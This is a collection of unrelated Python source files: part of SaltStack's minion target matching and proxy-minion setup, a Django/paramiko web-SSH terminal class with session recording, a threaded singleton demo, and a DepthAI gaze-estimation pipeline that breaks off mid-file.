log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = str(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id '+self.opts['id']+'. '+\
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['environment'])
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname)+\
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv=self.opts['environment'])
self.grains_cache = self.opts['grains']
self.ready = True
|
ssh.py
|
import paramiko
from threading import Thread
from .tools import get_key_obj
from asgiref.sync import async_to_sync
import socket
from django.conf import settings
import json
import time
import sys
import os
import traceback
from util.tool import gen_rand_char, res as save_res
from util.control import remove_control_chars
from mp_readline import mp_readline
import re
import logging
logging.basicConfig(level=logging.INFO, format='[%(asctime)s] - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
try:
terminal_exipry_time = settings.CUSTOM_TERMINAL_EXIPRY_TIME
except Exception:
terminal_exipry_time = 60 * 30
# sz
zmodemszstart = b'**\x18B00000000000000\r\x8a\x11'
zmodemszend = b'**\x18B0800000000022d\r\x8a'
# rz
zmodemrzstart = b'**\x18B0100000023be50\r\x8a\x11' # rz
zmodemrzestart = b'**\x18B0100000063f694\r\x8a\x11' # rz -e
zmodemrzsstart = b'**\x18B0100000223d832\r\x8a\x11' # rz -S
zmodemrzesstart = b'**\x18B010000026390f6\r\x8a\x11' # rz -e -S
zmodemrzend = b'**\x18B0800000000022d\r\x8a'
# zmodem cancel
zmodemcancel = b'\x18\x18\x18\x18\x18\x08\x08\x08\x08\x08'
BufferSize = 4096 # 4096 足够,高于 4096 时使用 zmodem 传输时会出现错误
class SSH:
def __init__(self, websocker, message):
self.websocker = websocker
self.message = message
self.cmd = '' # 记录多行处理过的命令
self.cmd_tmp = '' # 记录一行待处理的命令
self.res = ''
self.start_time = time.time()
tmp_date1 = time.strftime("%Y-%m-%d", time.localtime(int(self.start_time)))
tmp_date2 = time.strftime("%Y%m%d%H%M%S", time.localtime(int(self.start_time)))
if not os.path.isdir(os.path.join(settings.RECORD_ROOT, tmp_date1)):
os.makedirs(os.path.join(settings.RECORD_ROOT, tmp_date1))
self.res_file = settings.RECORD_DIR + '/' + tmp_date1 + '/' + 'webssh_' + \
tmp_date2 + '_' + gen_rand_char(16) + '.txt'
self.last_save_time = self.start_time
self.res_asciinema = []
self.zmodem = False
self.zmodemOO = False
mp_readline.TESTING = True
self.rl = mp_readline.MpReadline()
self.tab_mode = False # 使用tab命令补全时需要读取返回数据然后添加到当前输入命令后
self.history_mode = False
self.enter = False # 是否输入回车 \r, 为 True 时则根据 ssh 服务端返回的数据判断是否是执行的命令或者是编辑文本
self.ctrl_z = False
self.ctrl_c = False
# term 可以使用 ansi, linux, vt100, xterm, dumb,除了 dumb外其他都有颜色显示
def connect(self, host, user, password=None, ssh_key=None, port=22, timeout=30,
term='xterm', pty_width=80, pty_height=24):
try:
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if ssh_key:
key = get_key_obj(paramiko.RSAKey, pkey_obj=ssh_key, password=password) or \
get_key_obj(paramiko.DSSKey, pkey_obj=ssh_key, password=password) or \
get_key_obj(paramiko.ECDSAKey, pkey_obj=ssh_key, password=password) or \
get_key_obj(paramiko.Ed25519Key, pkey_obj=ssh_key, password=password)
ssh_client.connect(username=user, hostname=host, port=port, pkey=key, timeout=timeout)
else:
ssh_client.connect(username=user, password=password, hostname=host, port=port, timeout=timeout)
transport = ssh_client.get_transport()
self.channel = transport.open_session()
self.channel.get_pty(term=term, width=pty_width, height=pty_height)
self.channel.invoke_shell()
# 如果socket连接在指定时间内无数据交互会断开,原理就是读取socket连接,如果指定时间内无返回就抛出异常
# 需要注意:当在终端上运行无输入内容但是会阻塞当前阻断的程序时如果超过这个时间也会被断开
self.channel.settimeout(terminal_exipry_time) # 30分钟
self.res_asciinema.append(
json.dumps(
{
"version": 2,
"width": 250, # 设置足够宽,以便播放时全屏不至于显示错乱
"height": 40,
"timestamp": int(self.start_time),
"env": {"SHELL": "/bin/sh", "TERM": term}
}
)
)
for i in range(2):
recv = self.channel.recv(4096).decode('utf-8')
self.message['status'] = 0
self.message['message'] = recv
message = json.dumps(self.message)
if self.websocker.send_flag == 0:
self.websocker.send(message)
elif self.websocker.send_flag == 1:
async_to_sync(self.websocker.channel_layer.group_send)(self.websocker.group, {
"type": "chat.message",
"text": message,
})
self.res += recv
delay = round(time.time() - self.start_time, 6)
self.res_asciinema.append(json.dumps([delay, 'o', recv]))
# 创建3个线程将服务器返回的数据发送到django websocket(1个线程都可以)
Thread(target=self.websocket_to_django).start()
except Exception:
print(traceback.format_exc())
self.message['status'] = 2
self.message['message'] = 'Connection faild...'
message = json.dumps(self.message)
if self.websocker.send_flag == 0:
self.websocker.send(message)
elif self.websocker.send_flag == 1:
async_to_sync(self.websocker.channel_layer.group_send)(self.websocker.group, {
"type": "chat.message",
"text": message,
})
self.websocker.close(3001)
def resize_pty(self, cols, rows):
self.channel.resize_pty(width=cols, height=rows)
def su_root(self, superuser, superpassword, wait_time=1):
self.django_to_ssh('su - {0}\n'.format(superuser))
time.sleep(wait_time)
try:
self.channel.send('{}\n'.format(superpassword))
except Exception:
print(traceback.format_exc())
self.close()
def django_to_ssh(self, data):
try:
self.channel.send(data)
if not self.zmodem and not self.zmodemOO:
if data == '\r': # 回车,开始根据服务端返回判断是否是命令,这种判断方式的特性就导致了无法是否禁止命令功能,当然想绝对禁止命令本身就是一个伪命题
if self.cmd_tmp.strip() != '':
self.enter = True
elif data.encode() == b'\x07': # 响铃
pass
elif data == '\t' or data.encode() == b'\x1b': # \x1b 点击2下esc键也可以补全
self.tab_mode = True
elif data.encode() == b'\x1b[A' or data.encode() == b'\x1b[B':
self.history_mode = True
elif data.encode() == b'\x03': # 输入命令后先 ctrl + v,然后 ctrl + c 需要两次才能取消
self.ctrl_c = True
elif data.encode() == b'\x1a': # ctrl + z
self.ctrl_z = True
else:
self.cmd_tmp += data
except Exception:
logger.error(traceback.format_exc())
self.close()
def django_bytes_to_ssh(self, data):
try:
self.channel.send(data)
except:
logger.error(traceback.format_exc())
self.close()
def websocket_to_django(self):
try:
while 1:
if self.zmodemOO:
self.zmodemOO = False
x = self.channel.recv(2)
if not len(x):
return
if x == b'OO':
self.websocker.send(bytes_data=x)
continue
else:
x += self.channel.recv(BufferSize)
else:
x = self.channel.recv(BufferSize)
if not len(x):
return
if self.zmodem:
if zmodemszend in x or zmodemrzend in x:
self.zmodem = False
if zmodemszend in x:
self.zmodemOO = True
if zmodemcancel in x:
self.zmodem = False
self.channel.send('\n')
self.websocker.send(bytes_data=x)
else:
if zmodemszstart in x or zmodemrzstart in x or zmodemrzestart in x or zmodemrzsstart in x \
or zmodemrzesstart in x:
self.zmodem = True
self.websocker.send(bytes_data=x)
else:
try:
data = x.decode('utf-8')
except UnicodeDecodeError: # utf-8中文占3个字符,可能会被截断,需要拼接
try:
x += self.channel.recv(1)
data = x.decode('utf-8')
except UnicodeDecodeError:
try:
x += self.channel.recv(1)
data = x.decode('utf-8')
except UnicodeDecodeError:
logger.error(traceback.format_exc())
data = x.decode('utf-8', 'ignore') # 拼接2次后还是报错则证明结果是乱码,强制转换
self.message['status'] = 0
self.message['message'] = data
self.res += data
message = json.dumps(self.message)
if self.websocker.send_flag == 0:
self.websocker.send(message)
elif self.websocker.send_flag == 1:
async_to_sync(self.websocker.channel_layer.group_send)(self.websocker.group, {
"type": "chat.message",
"text": message,
})
delay = round(time.time() - self.start_time, 6)
self.res_asciinema.append(json.dumps([delay, 'o', data]))
# 指定条结果或者指定秒数或者占用指定内存就保存一次
if len(self.res_asciinema) > 2000 or int(time.time() - self.last_save_time) > 60 or \
sys.getsizeof(self.res_asciinema) > 20971752:
tmp = list(self.res_asciinema)
self.res_asciinema = []
self.last_save_time = time.time()
save_res(self.res_file, tmp)
if self.enter:
self.enter = False
if not data.startswith("\r\n"): # 回车后结果不以\r\n开头的肯定不是命令
self.cmd_tmp = ''
else:
if re.match(rb'^\r\n\s+\x1b.*$', x): # 终端为 xterm,linux 等显示颜色类型时在 vi 编辑模式下回车
self.cmd_tmp = ''
# elif x == b'\r\n': # todo 正常模式下 vi 文件会返回 \r\n ,终端为 dumb 类型时在 vi 编辑模式下回车也会返回 \r\n,
# self.cmd_tmp = ''
else: # 记录真正命令, rl 不支持中文命令
cmd_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(int(time.time())))
cmd = self.rl.process_line(self.cmd_tmp.encode("utf-8"))
if cmd is None: # 有可能 rl 库会返回 None,重试一次
mp_readline.TESTING = True
self.rl = mp_readline.MpReadline()
cmd = self.rl.process_line(self.cmd_tmp.encode("utf-8"))
if cmd:
self.cmd += cmd_time + "\t" + remove_control_chars(cmd) + '\n'
else:
if cmd is None:
logger.error("recv from server: {} \nerror command: {}".format(x, self.cmd_tmp.encode("utf-8")))
self.cmd += cmd_time + "\t" + remove_control_chars(self.cmd_tmp) + '\n'
self.cmd_tmp = ''
else:
if self.tab_mode: # todo 兼容有问题
self.tab_mode = False
if x == b'\x07':
pass
tmp = data.split(' ')
# tab 只返回一个命令时匹配
if len(tmp) == 2 and tmp[1] == '' and tmp[0] != '':
self.cmd_tmp = self.cmd_tmp + tmp[0].encode().replace(b'\x07', b'').decode()
elif len(tmp) == 1 and tmp[0].encode() != b'\x07': # \x07 蜂鸣声
self.cmd_tmp = self.cmd_tmp + tmp[0].encode().replace(b'\x07', b'').decode()
# 多次上下箭头查找历史命令返回数据中可能会包含 \x1b[1P 导致 rl 无法解析命令,具体原因没有深究
if self.history_mode:
self.history_mode = False
if x != b'' and x != b'\x07':
x = re.sub(rb'\x1b\[\d+P', b'', x)
self.cmd_tmp += x.decode("utf-8")
if self.ctrl_c: # 取消命令
self.ctrl_c = False
# if x == b'^C\r\n':
if re.match(rb'^\^C\r\n[\s\S]*$', x) or re.match(rb'^\r\n[\s\S]*$', x):
self.cmd_tmp = ""
if self.ctrl_z:
self.ctrl_z = False
if re.match(rb'^[\s\S]*\[\d+\]\+\s+Stopped\s+\S+[\s\S]*$', x):
self.cmd_tmp = ""
except socket.timeout:
self.message['status'] = 1
self.message['message'] = '由于长时间没有操作或者没有数据返回,连接已断开!'
message = json.dumps(self.message)
if self.websocker.send_flag == 0:
self.websocker.send(message)
elif self.websocker.send_flag == 1:
async_to_sync(self.websocker.channel_layer.group_send)(self.websocker.group, {
"type": "chat.message",
"text": message,
})
self.close(send_message=False)
except Exception:
logger.info(traceback.format_exc())
self.close()
def close(self, send_message=True):
try:
if send_message:
self.message['status'] = 1
self.message['message'] = 'Connection closed...'
message = json.dumps(self.message)
if self.websocker.send_flag == 0:
self.websocker.send(message)
elif self.websocker.send_flag == 1:
async_to_sync(self.websocker.channel_layer.group_send)(self.websocker.group, {
"type": "chat.message",
"text": message,
})
self.websocker.close()
self.channel.close()
except Exception:
# logger.error(traceback.format_exc())
pass
def shell(self, data):
# 原作者使用创建线程的方式发送数据到ssh,每次发送都是一个字符,可以不用线程
# 直接调用函数性能更好
# Thread(target=self.django_to_ssh, args=(data,)).start()
self.django_to_ssh(data)
# 原作者将发送数据到django websocket的线程创建函数如果写到这,会导致每在客户端输入一个字符就创建一个线程
# Thread(target=self.websocket_to_django).start()
|
main.py
|
from threading import Lock, Thread
from time import sleep
class SingletonMeta(type):
__instances: dict = {}
__lock: Lock = Lock()
def __call__(cls, *args, **kwargs):
with cls.__lock:
if cls not in cls.__instances:
sleep(2)
instance = super().__call__(*args, **kwargs)
cls.__instances[cls] = instance
return cls.__instances[cls]
class Singleton(metaclass=SingletonMeta):
__value: str = None
def __init__(self, value: str):
self.__value = value
def getValue(self) -> str:
return self.__value
def test_singleton(value: str) -> None:
obj = Singleton(value)
print(f"Value : {obj.getValue()}")
if __name__ == "__main__":
thread1 = Thread(target=test_singleton, args=("Foo", ))
thread2 = Thread(target=test_singleton, args=("Bar", ))
thread1.start()
thread2.start()
|
main.py
|
import argparse
import queue
import threading
import signal
from pathlib import Path
import cv2
import depthai
import numpy as np
from imutils.video import FPS
from math import cos, sin
parser = argparse.ArgumentParser()
parser.add_argument('-nd', '--no-debug', action="store_true", help="Prevent debug output")
parser.add_argument('-cam', '--camera', action="store_true", help="Use DepthAI 4K RGB camera for inference (conflicts with -vid)")
parser.add_argument('-vid', '--video', type=str, help="Path to video file to be used for inference (conflicts with -cam)")
parser.add_argument('-laz', '--lazer', action="store_true", help="Lazer mode")
args = parser.parse_args()
debug = not args.no_debug
camera = not args.video
if args.camera and args.video:
raise ValueError("Incorrect command line parameters! \"-cam\" cannot be used with \"-vid\"!")
elif args.camera is False and args.video is None:
raise ValueError("Missing inference source! Either use \"-cam\" to run on DepthAI camera or \"-vid <path>\" to run on video file")
def draw_3d_axis(image, head_pose, origin, size=50):
# From https://github.com/openvinotoolkit/open_model_zoo/blob/b1ff98b64a6222cf6b5f3838dc0271422250de95/demos/gaze_estimation_demo/cpp/src/results_marker.cpp#L50
origin_x,origin_y = origin
yaw,pitch, roll = np.array(head_pose)*np.pi / 180
sinY = sin(yaw )
sinP = sin(pitch )
sinR = sin(roll )
cosY = cos(yaw )
cosP = cos(pitch )
cosR = cos(roll )
# X axis (red)
x1 = origin_x + size * (cosR * cosY + sinY * sinP * sinR)
y1 = origin_y + size * cosP * sinR
cv2.line(image, (origin_x, origin_y), (int(x1), int(y1)), (0, 0, 255), 3)
# Y axis (green)
x2 = origin_x + size * (cosR * sinY * sinP + cosY * sinR)
y2 = origin_y - size * cosP * cosR
cv2.line(image, (origin_x, origin_y), (int(x2), int(y2)), (0, 255, 0), 3)
# Z axis (blue)
x3 = origin_x + size * (sinY * cosP)
y3 = origin_y + size * sinP
cv2.line(image, (origin_x, origin_y), (int(x3), int(y3)), (255, 0, 0), 2)
return image
def frame_norm(frame, bbox):
norm_vals = np.full(len(bbox), frame.shape[0])
norm_vals[::2] = frame.shape[1]
return (np.clip(np.array(bbox), 0, 1) * norm_vals).astype(int)
def to_planar(arr: np.ndarray, shape: tuple) -> list:
return [val for channel in cv2.resize(arr, shape).transpose(2, 0, 1) for y_col in channel for val in y_col]
def to_tensor_result(packet):
return {
tensor.name: np.array(packet.getLayerFp16(tensor.name)).reshape(tensor.dims)
for tensor in packet.getRaw().tensors
}
def padded_point(point, padding, frame_shape=None):
if frame_shape is None:
return [
point[0] - padding,
point[1] - padding,
point[0] + padding,
point[1] + padding
]
else:
def norm(val, dim):
return max(0, min(val, dim))
if np.any(point - padding > frame_shape[:2]) or np.any(point + padding < 0):
print(f"Unable to create padded box for point {point} with padding {padding} and frame shape {frame_shape[:2]}")
return None
return [
norm(point[0] - padding, frame_shape[0]),
norm(point[1] - padding, frame_shape[1]),
norm(point[0] + padding, frame_shape[0]),
norm(point[1] + padding, frame_shape[1])
]
def create_pipeline():
print("Creating pipeline...")
pipeline = depthai.Pipeline()
pipeline.setOpenVINOVersion(depthai.OpenVINO.VERSION_2020_1)
if camera:
print("Creating Color Camera...")
cam = pipeline.createColorCamera()
cam.setPreviewSize(300, 300)
cam.setResolution(depthai.ColorCameraProperties.SensorResolution.THE_1080_P)
cam.setInterleaved(False)
cam.setBoardSocket(depthai.CameraBoardSocket.RGB)
cam_xout = pipeline.createXLinkOut()
cam_xout.setStreamName("cam_out")
cam.preview.link(cam_xout.input)
# NeuralNetwork
print("Creating Face Detection Neural Network...")
face_nn = pipeline.createNeuralNetwork()
face_nn.setBlobPath(str(Path("models/face-detection-retail-0004/face-detection-retail-0004_openvino_2020.1_4shave.blob").resolve().absolute()))
if camera:
cam.preview.link(face_nn.input)
else:
face_in = pipeline.createXLinkIn()
face_in.setStreamName("face_in")
face_in.out.link(face_nn.input)
face_nn_xout = pipeline.createXLinkOut()
face_nn_xout.setStreamName("face_nn")
face_nn.out.link(face_nn_xout.input)
# NeuralNetwork
print("Creating Landmarks Detection Neural Network...")
land_nn = pipeline.createNeuralNetwork()
land_nn.setBlobPath(
str(Path("models/landmarks-regression-retail-0009/landmarks-regression-retail-0009_openvino_2020.1_4shave.blob").resolve().absolute())
)
land_nn_xin = pipeline.createXLinkIn()
land_nn_xin.setStreamName("landmark_in")
land_nn_xin.out.link(land_nn.input)
land_nn_xout = pipeline.createXLinkOut()
land_nn_xout.setStreamName("landmark_nn")
land_nn.out.link(land_nn_xout.input)
# NeuralNetwork
print("Creating Head Pose Neural Network...")
pose_nn = pipeline.createNeuralNetwork()
pose_nn.setBlobPath(
str(Path("models/head-pose-estimation-adas-0001/head-pose-estimation-adas-0001_openvino_2020.1_4shave.blob").resolve().absolute())
)
pose_nn_xin = pipeline.createXLinkIn()
pose_nn_xin.setStreamName("pose_in")
pose_nn_xin.out.link(pose_nn.input)
pose_nn_xout = pipeline.createXLinkOut()
pose_nn_xout.setStreamName("pose_nn")
pose_nn.out.link(pose_nn_xout.input)
# NeuralNetwork
print("Creating Gaze Estimation Neural Network...")
gaze_nn = pipeline.createNeuralNetwork()
gaze_nn.setBlobPath(
str(Path("models/gaze-estimation-adas-0002/gaze-estimation-adas-0002_openvino_2020.1_4shave.blob").resolve().absolute())
)
gaze_nn_xin = pipeline.createXLinkIn()
gaze_nn_xin.setStreamName("gaze_in")
gaze_nn_xin.out.link(gaze_nn.input)
gaze_nn_xout = pipeline.createXLinkOut()
gaze_nn_xout.setStreamName("gaze_nn")
gaze_nn.out.link(gaze_nn_xout.input)
return pipeline
class Main:
def __init__(self, device):
self.device = device
print("Starting pipeline...")
self.device.startPipeline()
if camera:
self.cam_out = self.device.getOutputQueue("cam_out")
else:
self.face_in = self.device.getInputQueue("face_in")
if not camera:
self.cap = cv2.VideoCapture(str(Path(args.video).resolve().absolute()))
self.frame = None
self.face_box_q = queue.Queue()
self.bboxes = []
self.left_bbox = None
self.right_bbox = None
self.nose = None
self.pose = None
self.gaze = None
self.running = True
self.fps = FPS()
self.fps.start()
def face_thread(self):
face_nn = self.device.getOutputQueue("face_nn")
landmark_in = self.device.getInputQueue("landmark_in")
pose_in = self.device.getInputQueue("pose_in")
while self.running:
if self.frame is None:
continue
try:
bboxes = np.array(face_nn.get().getFirstLayerFp16())
except RuntimeError as ex:
continue
bboxes = bboxes.reshape((bboxes.size // 7, 7))
self.bboxes = bboxes[bboxes[:, 2] > 0.7][:, 3:7]
for raw_bbox in self.bboxes:
bbox = frame_norm(self.frame, raw_bbox)
det_frame = self.frame[bbox[1]:bbox[3], bbox[0]:bbox[2]]
land_data = depthai.NNData()
land_data.setLayer("0", to_planar(det_frame, (48, 48)))
landmark_in.send(land_data)
pose_data = depthai.NNData()
pose_data.setLayer("data", to_planar(det_frame, (60, 60)))
pose_in.send(pose_data)
self.face_box_q.put(bbox)
def land_pose_thread(self):
landmark_nn = self.device.getOutputQueue(name="landmark_nn", maxSize=1, blocking=False)
pose_nn = self.device.getOutputQueue(name="pose_nn", maxSize=1, blocking=False)
gaze_in = self.device.getInputQueue("gaze_in")
while self.running:
try:
land_in = landmark_nn.get().getFirstLayerFp16()
except RuntimeError as ex:
continue
try:
face_bbox = self.face_box_q.get(block=True, timeout=100)
except queue.Empty:
continue
self.face_box_q.task_done()
left = face_bbox[0]
top = face_bbox[1]
face_frame = self.frame[face_bbox[1]:face_bbox[3], face_bbox[0]:face_bbox[2]]
land_data = frame_norm(face_frame, land_in)
land_data[::2] += left
land_data[1::2] += top
left_bbox = padded_point(land_data[:2], padding=30, frame_shape=self.frame.shape)
if left_bbox is None:
print("Point for left eye is corrupted, skipping nn result...")
continue
self.left_bbox = left_bbox
right_bbox = padded_point(land_data[2:4], padding=30, frame_shape=self.frame.shape)
if right_bbox is None:
print("Point for right eye is corrupted, skipping nn result...")
continue
self.right_bbox = right_bbox
self.nose = land_data[4:6]
left_img = self.frame[self.left_bbox[1]:self.left_bbox[3], self.left_bbox[0]:self.left_bbox[2]]
right_img = self.frame[self.right_bbox[1]:self.right_bbox[3], self.right_bbox[0]:self.right_bbox[2]]
try:
# The output of pose_nn is in YPR format, which is the required sequence input for pose in gaze
# https://docs.openvinotoolkit.org/2020.1/_models_intel_head_pose_estimation_adas_0001_description_head_pose_estimation_adas_0001.html
# https://docs.openvinotoolkit.org/latest/omz_models_model_gaze_estimation_adas_0002.html
# ... three head pose angles – (yaw, pitch, and roll) ...
values = to_tensor_result(pose_nn.get())
self.pose = [
values['angle_y_fc'][0][0],
values['angle_p_fc'][0][0],
values['angle_r_fc'][0][0]
]
except RuntimeError as ex:
continue
gaze_data = depthai.NNData()
gaze_data.setLayer("left_eye_image", to_planar(left_img, (60, 60)))
gaze_data.setLayer("right_eye_image", to_planar(right_img, (60, 60)))
gaze_data.setLayer("head_pose_angles", self.pose)
gaze_in.send(gaze_data)
def gaze_thread(self):
